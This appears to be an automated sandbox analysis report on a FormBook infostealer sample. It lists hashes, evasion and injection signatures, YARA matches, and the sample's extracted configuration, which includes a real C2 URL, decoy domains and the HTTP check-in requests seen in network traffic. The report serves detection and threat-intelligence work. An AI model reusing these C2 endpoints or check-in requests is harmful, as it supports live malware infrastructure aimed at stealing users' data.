Windows Analysis Report
tlBHrCrteFXy8Jz.exe

Overview

General Information

Sample Name: tlBHrCrteFXy8Jz.exe
Analysis ID: 562118
MD5: 0e9943c0e2afaf5e9acec16ce184b444
SHA1: dc1c5f809a3e6e9a3358878d455cb235d2245460
SHA256: dc368951f1df68a92c51f9afe6ad73c717b040fb9af6a278e9201b176362ed70
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.meizi.ltd/b3xd/"], "decoy": ["nestonconstruction.com", "ratnainternational.com", "3bersaudara.com", "scottkmoody.store", "1metroband.com", "prechit.com", "desertbirdmercantile.com", "marciabernice.com", "packard.vote", "selo.global", "fourthandwhiteoak.com", "ecoplagas.online", "api-jipotvcom.xyz", "shabellafurniture.com", "maxmonacomarble.com", "imprimiruncalendario.com", "cochepordinero.net", "teamosu.club", "therightleftfoot.com", "mitt-masters.com", "transformeddestiny.com", "vzyz.top", "perfectotr.com", "rnhapr.com", "polebear.xyz", "tiatapa.com", "plick-click.com", "losfantasticos.com", "georgemacpherson.xyz", "sadiknitwears.com", "hpmetaverse.com", "smart-life-hacks.com", "gpowermall.com", "codegreenautomation.com", "investment-scientist.com", "igthksolution.com", "lrtlffnr.xyz", "ecomm-hub.com", "99ganbi.top", "quaked.net", "teliazepte.com", "www24fa.top", "nobleslim.com", "hsbsr9s.sbs", "yetiecoolerusa.com", "hourly.limo", "idesignuix.com", "fun4freegames.com", "wxqfilm.com", "auburnfuid.com", "chengxinyuan.online", "yzztx.com", "huggsforbubbs.com", "cdrbk.com", "eclipses.today", "sigmamu.com", "5pineridge.com", "lowfrictionvideo.com", "ord12route.art", "accreditslots.com", "madeitinhome.com", "insurance.pink", "thietkenoithatvanphong.asia", "gkynykj.com"]}
Yara detected FormBook
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: www.meizi.ltd/b3xd/ Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: tlBHrCrteFXy8Jz.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance
barindex
Uses 32bit PE files
Source: tlBHrCrteFXy8Jz.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: tlBHrCrteFXy8Jz.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ASCIIEncodi.pdb source: tlBHrCrteFXy8Jz.exe
Source: Binary string: wntdll.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: explorer.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp

Software Vulnerabilities
barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe Code function: 4x nop then pop edi 11_2_004162C4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4x nop then pop edi 16_2_02F962C4

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49805 -> 162.241.24.116:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49805 -> 162.241.24.116:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49805 -> 162.241.24.116:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49824 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49824 -> 160.153.136.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49824 -> 160.153.136.3:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thietkenoithatvanphong.asia
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 222.255.46.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.116 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.desertbirdmercantile.com
Source: C:\Windows\explorer.exe Domain query: www.yzztx.com
Source: C:\Windows\explorer.exe Domain query: www.sigmamu.com
Source: C:\Windows\explorer.exe Network Connect: 154.214.67.82 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.meizi.ltd/b3xd/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA== HTTP/1.1Host: www.desertbirdmercantile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ HTTP/1.1Host: www.thietkenoithatvanphong.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w== HTTP/1.1Host: www.yzztx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ HTTP/1.1Host: www.sigmamu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:03:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.desertbirdmercantile.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 09 0d 0a Data Ascii: e9<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com/
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000D.00000000.404330090.0000000006870000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.347608168.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.317325369.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.331095005.0000000006840000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302412697.0000000001977000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comoX
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.305559596.00000000074B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown DNS traffic detected: queries for: www.desertbirdmercantile.com
Source: global traffic HTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=Ie1PhgByqbmAnBTD/2NTTWN841CMZzf2VbgiXa4AsIuYcZI/bp6cv0uoISKMiipyVSmV9CFFiA== HTTP/1.1Host: www.desertbirdmercantile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b3xd/?iRah=JdJx4d7W9+IGJje0hU/QcPoKaGdRUKvyvIN3jQdk7kxI7FpVQbo1IF0KYDc1cvBgS1iZcvDTaA==&qPYT=aV9tZ HTTP/1.1Host: www.thietkenoithatvanphong.asiaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b3xd/?qPYT=aV9tZ&iRah=u1+lAjLBA2+kcdvhq4UZu/nPbWuE94hnVKEDKIE9CxGJPgk2ISTbeIcckL5CyvhDdyZbFg7D5w== HTTP/1.1Host: www.yzztx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /b3xd/?iRah=5GWj3iokSHma3YiDoT3m16TCcfPCT77oIBdOELLk89ETJqvKsRjgRlGfGSz2uWFXBl65BQRHGg==&qPYT=aV9tZ HTTP/1.1Host: www.sigmamu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.tlBHrCrteFXy8Jz.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.tlBHrCrteFXy8Jz.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.tlBHrCrteFXy8Jz.exe.445b350.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.tlBHrCrteFXy8Jz.exe.44b2170.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.299250808.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.373779572.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.299753354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.372769249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
